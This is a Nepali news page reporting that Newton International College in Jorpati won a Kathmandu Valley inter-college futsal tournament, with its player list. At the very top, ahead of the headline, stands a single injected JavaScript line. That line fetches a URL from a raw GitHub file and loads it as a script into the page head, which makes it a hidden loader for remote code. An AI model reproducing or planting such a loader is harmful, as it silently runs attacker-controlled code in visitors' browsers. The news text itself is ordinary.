;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौँ उपत्यका ब्यापी फुटसल प्रतियोगितामा जोरपाटीको न्युटन कलेज प्रथम – जुनेली न्युज
सोमवार, असार १०, २०८२
  • होमपेज
  • काठमाडौँ उपत्यका ब्यापी फुटसल प्रतियोगितामा जोरपाटीको न्युटन कलेज प्रथम
Breaking News

काठमाडौँ उपत्यका ब्यापी फुटसल प्रतियोगितामा जोरपाटीको न्युटन कलेज प्रथम

जुनेली न्युज, काठमाडौँ |

कोटेश्वर बहुमुखी क्याम्पस स्ववियुद्वारा आयोजना गरिएको काठमाडौँ उपत्यका ब्यापी अन्तर कलेज खुल्ला फुटसल प्रतियोगितामा न्युटन इन्टरनेशनल कलेजले जित हात पारेको छ |

प्रतियोगितामा काठमाडौँ जिल्ला भरिका ४० कलेजहरु समावेश भएका थिए सो मध्यमा जोरपाटीमा रहेको न्युटन कलेजले प्रथम स्थान हासिल गरेको हो |

प्रथम भएको न्युटन कलेजले १ लाख नगद सहित शिल्ड मेडल प्रमाण पत्र प्राप्त गरेको थियो |

न्यूटन कलेजले सर्वोत्कृष्ट गोल किपर पनि प्राप्त गर्न सफल भएको थियो |

खेलाडीहरु :
Anjil Dumee Rai- Captain
Joyal KC
Santosh Waiba
Ramesh Tamang
Tikaram Tamang
Saroj Dayal
Onana Shrestha
Jawati BK
Dipesh
Onana Shrestha- Best Goalkeeper

फेसबुक प्रतिक्रियाहरु